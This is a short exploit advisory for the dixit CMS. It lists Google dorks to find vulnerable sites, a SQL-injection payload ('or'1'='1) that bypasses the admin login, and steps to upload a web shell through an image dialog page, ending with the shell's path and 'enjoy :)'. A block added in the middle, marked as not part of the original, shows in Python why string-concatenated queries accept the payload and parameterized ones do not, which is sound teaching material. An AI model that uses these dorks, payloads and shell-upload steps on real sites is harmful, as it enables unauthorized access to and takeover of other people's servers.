
dixit Admin Login Bypass

Author: wlhaan hacker, Published: 06-10-2014
#################################################################################

# exploit: dixit Admin Login Bypass

# Author: wlhaan hacker

# Vendor URL: http://www.dixit.net/

# download script

http://fossies.org/linux/privat/dixit20b.zip

# google dork


"powered by dixit"

or
allinurl:"admin.php?editid=1"


#################################################################################



==========================

Vulnerability Description



==================

PoC-Exploit

==================



http://<target>.com/admin.php



User:

'or'1'='1



pass:

'or'1'='1
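
Why these two values pass the login check, shown as an added example that is not part of the original advisory or the dixit code. It assumes the login query is built by string concatenation (the table, columns and function names are hypothetical) and compares that with a bound-parameter lookup against a constructed in-memory SQLite database.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "'or'1'='1"              # the value the advisory enters in both fields
DEMO_PASSWORD = "s3cret-constructed"  # constructed sample credential


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    # Constructed schema: names are assumptions, not taken from dixit.
    # The plaintext column exists only so the vulnerable variant has
    # something to compare against.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-salt"
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", DEMO_PASSWORD, salt, hash_password(DEMO_PASSWORD, salt)))
    return db


def login_vulnerable(db, user, password):
    # Input is pasted into the SQL text, so its quotes become SQL syntax:
    #   ... username = ''or'1'='1' AND password = ''or'1'='1'
    # The trailing OR '1'='1' makes the WHERE clause true for every row.
    sql = ("SELECT 1 FROM admins WHERE username = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_hardened(db, user, password):
    # Bound parameter: the input is compared as data and never parsed as SQL.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    # Verify a salted hash in constant time instead of matching in SQL.
    return hmac.compare_digest(hash_password(password, row[0]), row[1])


if __name__ == "__main__":
    db = make_db()
    print("concatenated query accepts payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized query accepts payload:", login_hardened(db, PAYLOAD, PAYLOAD))
```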


# upload shell

admin.dialogs.images.php

http://<target>/admin/admin.dialogs.images.php

# your shell


http://<target>/admin/data/images/yourshell.php






enjoy :)



have a nice time



#################################################################################



Discovered By : wlhaan hacker





https://twitter.com/waleedal3ybani



https://www.facebook.com/waleed.alaibani
